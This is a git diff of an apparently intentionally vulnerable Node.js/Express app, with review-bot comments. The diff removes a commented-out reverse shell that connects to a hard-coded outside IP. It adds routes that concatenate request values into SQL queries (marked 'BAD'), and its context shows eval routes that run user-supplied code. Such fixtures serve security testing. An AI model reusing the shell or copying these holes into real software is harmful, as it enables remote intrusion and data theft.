diff --git a/readme.md b/readme.md index 80d8fb5..ccb78d2 100644 --- a/readme.md +++ b/readme.md @@ -2,4 +2,4 @@ - +test diff --git a/routes/rce.js b/routes/rce.js index 3db070c..e726b65 100644 --- a/routes/rce.js +++ b/routes/rce.js @@ -1,24 +1,9 @@ const vm = require('vm'); - +const pg = require('pg'); +const pool = new pg.Pool(config); const express = require('express'); const router = express.Router(); -// http://localhost:3000/eval?args=jscode -/* linux reverse shell -(function(){ - const net=require("net"), - cp=require("child_process"), - sh=cp.spawn("/bin/sh",["-i"]); - const client=new net.Socket(); - client.connect(8080,"18.216.236.191", function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }); - return /pwned/; -})() -*/ - // http://localhost:3000/eval?code=this.process.env router.get('/eval', function(req, res) { @@ -32,4 +17,16 @@ router.get('/vm', function(req, res) { res.send(result); }); +// http://localhost:3000/handle?code=this.process.env +router.get('/handle', function(req, res) { + // BAD: the category might have SQL special characters in it + + var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + + req.params.category + "' ORDER BY PRICE"; + pool.query(query1, [], function(err, results) { + // process results + }); + }); + + module.exports = router; diff --git a/routes/user.js b/routes/user.js index b57fb5f..14e04f1 100644 --- a/routes/user.js +++ b/routes/user.js @@ -1,7 +1,8 @@ const express = require('express'); const router = express.Router(); - +const pg = require('pg'); +const pool = new pg.Pool(config); const Secrets = require('../lib/secrets'); const secret = Math.random().toString(36).substr(2); 
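Review bot: `config` in the added `const pool = new pg.Pool(config);` is neither declared nor required anywhere in this hunk, and the hunk starts at line 1 of routes/rce.js, so unless `config` is installed as a global elsewhere the module throws a ReferenceError the moment it is required. The same undeclared `config` is added at the top of routes/user.js in this commit. Either require the settings module the project actually uses (`const config = require('<path-to-config>');`, with the path filled in) or pass the connection settings explicitly, e.g. `const pool = new pg.Pool({ connectionString: process.env.DATABASE_URL });` as a constructed example. Creating a separate pool in each route file also means the process opens two independent connection pools; a single shared pool module is the usual shape.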
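Review bot: `req.params.category` is always `undefined` in the new `/handle` route because its path declares no `:category` segment, so the concatenated query always compares ITEM_CATEGORY against the literal string 'undefined'; the `/get` route added in routes/user.js has the same mismatch (`req.params.id` with no `:id`). The query callback also ignores `err` and never touches `res`, so every request to these routes hangs until the client gives up. The copied comment `// http://localhost:3000/handle?code=this.process.env` describes the /eval route, not this one, and should be dropped or rewritten. If the string concatenation is deliberately kept as the flagged pattern (the `// BAD:` comment suggests so), the route parameter and the missing response still need fixing; the version below shows the pg placeholder form with error handling and a response. The router.get('/vm') callback visible in the context lines starts outside the hunk.
```javascript
router.get('/handle/:category', function(req, res) {
  pool.query(
    'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1 ORDER BY PRICE',
    [req.params.category],
    function(err, results) {
      if (err) {
        return res.status(500).send('query failed');
      }
      res.json(results.rows);
    }
  );
});
```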
@@ -47,4 +48,15 @@ router.delete('/user/:id', function(req, res) { res.json(); }); +// get user info +router.get('/get', function(req, res) { + // BAD: the category might have SQL special characters in it + + var query1 = "SELECT NAME, EMAIL FROM USER WHERE USER_ID='" + + req.params.id + "'"; + pool.query(query1, [], function(err, results) { + // process results + }); + }); + module.exports = router;
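Review bot: The copied comment `// BAD: the category might have SQL special characters in it` names the wrong value in the new `/get` route: the query embeds `req.params.id` into USER_ID, so it should read `// BAD: the id might have SQL special characters in it`. The route path `/get` declares no `:id` segment, so the embedded value is always `undefined`, and the callback never handles `err` or sends a response; see the note on routes/rce.js `/handle`, which applies here unchanged. The router.delete('/user/:id') callback visible in the context lines starts outside the hunk.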